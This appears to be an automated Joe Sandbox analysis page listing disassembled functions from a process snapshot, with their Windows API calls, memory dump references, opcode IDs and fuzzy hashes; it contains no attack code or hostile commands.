                                                                                                                                                                                                                          Function 01087620 Relevance: 18.1, APIs: 9, Strings: 1, Instructions: 571synchronizationCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetTickCount64.KERNEL32 ref: 01087985
                                                                                                                                                                                                                          • CoWaitForMultipleHandles.OLE32(-00000002,00000000,00650076,?,00000080), ref: 01087A05
                                                                                                                                                                                                                          • WaitForMultipleObjectsEx.KERNEL32(00650076,?,7CAB6A82,00000000,00000000,00000000,04000000,7CAB6A82,00000000,0000002C), ref: 01087A35
                                                                                                                                                                                                                          • GetTickCount64.KERNEL32 ref: 01087A88
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 01087AC8
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 01087B14
                                                                                                                                                                                                                          • GetTickCount64.KERNEL32 ref: 01087B48
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01087C19
                                                                                                                                                                                                                          • qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,00650076,00000004,010874C0), ref: 01087C6A
                                                                                                                                                                                                                            • Part of subcall function 01087E50: GetTickCount64.KERNEL32 ref: 01087F42
                                                                                                                                                                                                                            • Part of subcall function 01087E50: SignalObjectAndWait.KERNEL32(?,00000002,00650076,7CAB6A82,7CAB6A82,0000002C), ref: 01087F66
                                                                                                                                                                                                                            • Part of subcall function 01087E50: GetTickCount64.KERNEL32 ref: 01087FBA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • NotSupported_MaxWaitHandles_STA, xrefs: 01087CBE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Count64TickWait$Object$MultipleSingle$ErrorHandlesLastObjectsSignalqsort
                                                                                                                                                                                                                          • String ID: NotSupported_MaxWaitHandles_STA
                                                                                                                                                                                                                          • API String ID: 296535545-4026452055
                                                                                                                                                                                                                          • Opcode ID: 3400c08b5a21bf581a222765fcb08635bd7f023f6c094cb5d3f0cbad345d41a4
                                                                                                                                                                                                                          • Instruction ID: 005f3b567ec74f2dfa02d6cd750246c003243c32cb3419388057c80948a88cf2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3400c08b5a21bf581a222765fcb08635bd7f023f6c094cb5d3f0cbad345d41a4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0632BE71E04209DFDB24EFA8C844BADBBF1FF44314F244269E999AB395D734A941CB90
                                                                                                                                                                                                                          Function 0121C0D0 Relevance: 16.7, APIs: 11, Instructions: 219memorywindowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00001000,00000000,7CAB6A82,?,?,?,00000000,014E8F5B,000000FF,?,0121C5F9), ref: 0121C144
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00001000,00000000,7CAB6A82,?,?,?,00000000,014E8F5B,000000FF,?,0121C5F9,?,?,00000008,?), ref: 0121C18F
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,00000200,7CAB6A82,?,?,?,00000000), ref: 0121C237
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00000000,014E8F5B,000000FF,?,0121C5F9,?,?,00000008,?,00000000,?,?,0121C62F), ref: 0121C23F
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,014E8F5B,000000FF,?,0121C5F9), ref: 0121C26E
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,014E8F5B,000000FF), ref: 0121C2A2
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 0121C30D
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,000000FF,00000000,00000000), ref: 0121C348
                                                                                                                                                                                                                          • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00001000,00000000), ref: 0121C364
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 0121C384
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000200,7CAB6A82,?,?,?,00000000,014E8F5B,000000FF,?,0121C5F9,?,?,00000008), ref: 0121C3AE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorFreeHeapLast$FormatMessagewcscpy_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2570321710-0
                                                                                                                                                                                                                          • Opcode ID: 96a3a1db38bb60b42bd87250fcc6d8662dc0654dbff1c2ab46fc1096ed3f9dab
                                                                                                                                                                                                                          • Instruction ID: 4a73d84bb2c4128209d5644b4fa65cf86e394a753ec26c3d901fb1830c99952c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96a3a1db38bb60b42bd87250fcc6d8662dc0654dbff1c2ab46fc1096ed3f9dab
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6381F674A40219ABEB30DF68CC45FEA77B8EF14750F1046A9FA19EB2D4D7B05A90CB50
                                                                                                                                                                                                                          Function 012CFB00 Relevance: 15.4, APIs: 10, Instructions: 350memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SleepEx.KERNEL32(?,?), ref: 012CFB84
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 012CFBE2
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000030), ref: 012CFBFA
                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,00000000,?,00000001), ref: 012CFC4C
                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 012CFC7F
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 012CFCE1
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000018), ref: 012CFCFE
                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 012CFF1E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Alloc$ProcessVirtual$CounterFreePerformanceQuerySleep
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2913782672-0
                                                                                                                                                                                                                          • Opcode ID: 765a7c57592f302004d5e54ab0cbe2e072026b179b2fd18cb3ea1c68d6a079b2
                                                                                                                                                                                                                          • Instruction ID: 0b4c1cc6903ca616a29c7269f8bf247542716cce79d93b602f2d5461ee15b73e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 765a7c57592f302004d5e54ab0cbe2e072026b179b2fd18cb3ea1c68d6a079b2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1D16A706147029FD711CF29C980B1ABBE6FF98B14F148A2EEA89DB351D770E945CB81
                                                                                                                                                                                                                          Function 012BE530 Relevance: 14.0, APIs: 8, Strings: 1, Instructions: 550memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BE7AE
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BE86F
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BE932
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BEAAF
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BEB72
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BEC78
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BED2A
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BED4C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: cae29a40ce4754c567205e8172fe4cad3dfefe7a157d5b26140668c7a85f60aa
                                                                                                                                                                                                                          • Instruction ID: 0da8c3374e2175a170a0a0c2772e85f37f44c5ce6f542756c9a8608449aa3d2b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cae29a40ce4754c567205e8172fe4cad3dfefe7a157d5b26140668c7a85f60aa
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90328E70D106299FDF31DF24CC84BDAB7B8AF18344F0541EAEA09A7251E730AA95CF90
                                                                                                                                                                                                                          Function 012C75E0 Relevance: 14.0, APIs: 8, Strings: 1, Instructions: 550memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C785E
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C791F
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C79E2
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C7B5F
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C7C22
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C7D28
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C7DDA
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C7DFC
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: d7f90607f9da443d714f7e944fdb8f1faaa5e9afe3c72faa95c4d25ffbc92b2b
                                                                                                                                                                                                                          • Instruction ID: 8bb8bdb24912ec97a0f600d6f56db146dbd8c53085c7f6713a5846c9ff58cf4b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7f90607f9da443d714f7e944fdb8f1faaa5e9afe3c72faa95c4d25ffbc92b2b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4326E71D106299FDF21DF25CC84BDAB7B8AF19704F0402EAEA09A7251E7309B95CF90
                                                                                                                                                                                                                          Function 012C6DA0 Relevance: 14.0, APIs: 8, Strings: 1, Instructions: 550memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C701E
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C70DF
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C71A2
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C731F
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C73E2
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C74E8
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C759A
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C75BC
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: 188fd346534f0adfcae5f95727dee449e083e5a881fd9aa7b2296af0a587c5cb
                                                                                                                                                                                                                          • Instruction ID: 715d79cc380bcd2718acf036ab86c9dbb2a1978b520550c648919f620e9cbd00
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 188fd346534f0adfcae5f95727dee449e083e5a881fd9aa7b2296af0a587c5cb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01327E70D106299FDF31CF24DC84BDABBB9AF59704F4402EAEA09A7251D7309A95CF90
                                                                                                                                                                                                                          Function 010956E0 Relevance: 12.5, APIs: 8, Instructions: 540memorystringCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000), ref: 010957EB
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000), ref: 0109591B
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 01095A45
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 01095A6E
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000000,7CAB6A82,?,?), ref: 01095BEE
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000000,7CAB6A82,?,?), ref: 01095CB3
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000000,7CAB6A82,?,?), ref: 01095DFA
                                                                                                                                                                                                                            • Part of subcall function 01215D00: GetProcessHeap.KERNEL32(00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82,00000002), ref: 01215D0C
                                                                                                                                                                                                                            • Part of subcall function 01215D00: RtlAllocateHeap.NTDLL(03BF0000,00000000,?,00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82), ref: 01215D28
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00000004), ref: 01095EF3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Free$strcpy_s$AllocateProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2599166571-0
                                                                                                                                                                                                                          • Opcode ID: 2301600b1ab3dd63fdff3ef9333f5de4e5514a99b73861b860f7f448be485298
                                                                                                                                                                                                                          • Instruction ID: f7c7ebfd2dde8c9c1a0ad37f9344700823aa21dccc424828f36363675e54db4e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2301600b1ab3dd63fdff3ef9333f5de4e5514a99b73861b860f7f448be485298
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E03249B19012289BDF66CF29CC55BE9BBF4AF09310F0441DAE989A7390DB705E94DF90
                                                                                                                                                                                                                          Function 012C97A0 Relevance: 12.4, APIs: 7, Strings: 1, Instructions: 361memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,010D4669), ref: 012C988D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,010D4669), ref: 012C9920
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C99B0
                                                                                                                                                                                                                            • Part of subcall function 01215D50: GetProcessHeap.KERNEL32(7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D7E
                                                                                                                                                                                                                            • Part of subcall function 01215D50: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000030,7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D9A
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C99EB
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,010D4669), ref: 012C9B17
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C9BF2
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C9C09
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Free$AllocateProcess
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 1264717999-324932091
                                                                                                                                                                                                                          • Opcode ID: a51c8824a1a43ae4a564e95c4876bbbf125ed7441ccb3ca79fe3a8e577f48c16
                                                                                                                                                                                                                          • Instruction ID: 71b8e04c5ffd9a2bf8d042cbc9685bcd6c7008d81b96fd6f56cdc13bf1655105
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a51c8824a1a43ae4a564e95c4876bbbf125ed7441ccb3ca79fe3a8e577f48c16
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAD19E70E102099FDF21CF79D954B9EB7B8AF18744F50422EEA09EB251EB309991CF90
                                                                                                                                                                                                                          Function 0116B6C0 Relevance: 9.6, APIs: 6, Instructions: 622memorystringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000,0150E144,?), ref: 0116B89C
                                                                                                                                                                                                                            • Part of subcall function 01223C50: HeapFree.KERNEL32(00000000,?,?,?), ref: 01223D68
